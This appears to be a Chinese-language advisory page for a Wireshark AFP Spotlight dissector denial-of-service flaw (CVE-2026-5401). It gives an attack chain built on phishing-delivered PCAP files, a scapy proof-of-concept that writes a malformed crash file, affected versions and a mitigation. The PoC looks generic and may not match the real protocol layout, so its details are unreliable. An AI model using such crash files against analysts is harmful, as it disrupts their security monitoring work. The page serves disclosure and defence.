CVE-2026-5401 CVSS 5.5 中危

CVE-2026-5401 Wireshark AFP Spotlight协议拒绝服务漏洞

披露日期: 2026-04-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5401

漏洞类型

拒绝服务

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Wireshark

漏洞概述

Wireshark在处理AFP Spotlight协议数据包时存在安全漏洞，攻击者可诱导用户打开特制的抓包文件。受影响版本在解析畸形数据时会触发解析器崩溃，导致应用程序异常终止，从而造成拒绝服务攻击。

技术细节

该漏洞位于Wireshark的AFP Spotlight协议解析器组件中。根本原因是解析逻辑在处理特定数据包结构时缺乏足够的异常捕获和边界校验。当解析器遇到恶意构造的畸形数据流时，会尝试访问无效的内存地址（如空指针解引用）或读取越界数据，导致底层操作系统抛出异常并强制终止Wireshark进程。攻击向量为本地，且需要用户交互（如打开恶意文件），但在安全审计场景下，分析人员处理未知文件时极易中招，影响网络监控工作的连续性。

攻击链分析

STEP 1

步骤1

攻击者构造包含畸形AFP Spotlight协议数据包的恶意PCAP文件。

STEP 2

步骤2

攻击者通过网络钓鱼或文件共享将恶意PCAP文件发送给目标用户。

STEP 3

步骤3

目标用户使用受影响版本的Wireshark打开该文件进行分析。

STEP 4

步骤4

Wireshark的AFP Spotlight解析器处理畸形数据时触发异常，导致程序崩溃。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2026-5401
# This script generates a malformed AFP Spotlight packet to crash Wireshark.
# Note: Requires scapy to be installed.

from scapy.all import *

# Define a custom AFP Spotlight layer with malformed length
class AFP_Spotlight_Malformed(Packet):
    name = "AFP Spotlight Malformed"
    fields_desc = [
        ByteField("type", 0x02),
        IntField("length", 0xFFFFFFFF), # Malformed length to trigger overflow/crash
        StrLenField("data", "A" * 10, length_from=lambda pkt: 10)
    ]

# Construct the packet
ether = Ether()
ip = IP(dst="127.0.0.1")
tcp = TCP(sport=12345, dport=548) # AFP port
malformed_payload = AFP_Spotlight_Malformed()

packet = ether / ip / tcp / malformed_payload

# Save to pcap file
wrpcap("cve_2026_5401_poc.pcap", packet)
print("[+] PoC file generated: cve_2026_5401_poc.pcap")
print("[+] Open this file with a vulnerable Wireshark version to reproduce the crash.")

影响范围

Wireshark 4.4.0 - 4.4.14

Wireshark 4.6.0 - 4.6.4

防御指南

临时缓解措施

在无法立即升级的情况下，建议用户在Wireshark的“首选项”中暂时禁用AFP Spotlight协议解析器（Analyze -> Enabled Protocols -> 搜索AFP Spotlight并取消勾选），以防止解析恶意数据包。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表